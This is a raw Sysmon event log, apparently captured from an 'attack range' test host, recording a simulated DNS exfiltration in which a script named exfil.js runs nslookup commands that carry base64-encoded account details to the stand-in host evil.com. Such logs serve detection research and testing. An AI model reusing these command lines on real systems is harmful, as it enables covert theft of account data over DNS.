14:16:39.919{2E1864BB-17C7-629A-6741-000000005F02}2788C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000202779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.525{00000000-0000-0000-0000-000000000000}7528<unknown process>-udptruefalse127.0.0.1-52916-false127.0.0.1-53domain 354300x8000000000000000202778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.524{00000000-0000-0000-0000-000000000000}7528<unknown process>-udpfalsefalse127.0.0.1-52915-false127.0.0.1-53domain 354300x8000000000000000202777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.524{00000000-0000-0000-0000-000000000000}7528<unknown process>-udptruefalse127.0.0.1-52915-false127.0.0.1-53domain 354300x8000000000000000202776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.468{00000000-0000-0000-0000-000000000000}7668<unknown process>-udpfalsefalse127.0.0.1-52914-false127.0.0.1-53domain 354300x8000000000000000202775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.468{00000000-0000-0000-0000-000000000000}7668<unknown process>-udptruefalse127.0.0.1-52914-false127.0.0.1-53domain 23542300x8000000000000000202774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.905{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlilabr.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000202773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.468{00000000-0000-0000-0000-000000000000}7668<unknown process>-udpfalsefalse127.0.0.1-52913-false127.0.0.1-53domain 354300x8000000000000000202772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.468{00000000-0000-0000-0000-000000000000}7668<unknown process>-udptruefalse127.0.0.1-52913-false127.0.0.1-53domain 354300x8000000000000000202771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.467{00000000-0000-0000-0000-000000000000}7668<unknown process>-udpfalsefalse127.0.0.1-52912-false127.0.0.1-53domain 354300x8000000000000000202770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.467{00000000-0000-0000-0000-000000000000}7668<unknown process>-udptruefalse127.0.0.1-52912-false127.0.0.1-53domain 10341000x8000000000000000202769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-17C7-629A-6541-000000005F02}74523460C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6641-000000005F02}6140C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6641-000000005F02}6140C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.842{2E1864BB-17C7-629A-6441-000000005F02}56045436C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-6641-000000005F02}6140C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.847{2E1864BB-17C7-629A-6641-000000005F02}6140C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-6441-000000005F02}5604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlilabr.tmp 2>&1 22542200x8000000000000000202761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.388{00000000-0000-0000-0000-000000000000}5568evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.288{00000000-0000-0000-0000-000000000000}2060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.203{00000000-0000-0000-0000-000000000000}8096evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000202758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.820{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-6541-000000005F02}7452C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000202757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.141{00000000-0000-0000-0000-000000000000}3292evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000202756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.820{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-6541-000000005F02}7452C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000202755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.074{00000000-0000-0000-0000-000000000000}7464evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.992{00000000-0000-0000-0000-000000000000}7804evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.921{00000000-0000-0000-0000-000000000000}5704evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.865{00000000-0000-0000-0000-000000000000}8016evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.787{00000000-0000-0000-0000-000000000000}7264evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000202750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.698{00000000-0000-0000-0000-000000000000}2824evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000202749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.805{2E1864BB-17C7-629A-6541-000000005F02}74523460C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6441-000000005F02}5604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.789{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6541-000000005F02}7452C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.773{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.773{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.773{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.773{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.773{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-6441-000000005F02}5604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.773{2E1864BB-17A1-629A-783D-000000005F02}55526200C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-6441-000000005F02}5604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.776{2E1864BB-17C7-629A-6441-000000005F02}5604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlilabr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.757{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljiu.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.741{2E1864BB-17C7-629A-6241-000000005F02}76728132C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-6341-000000005F02}2932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 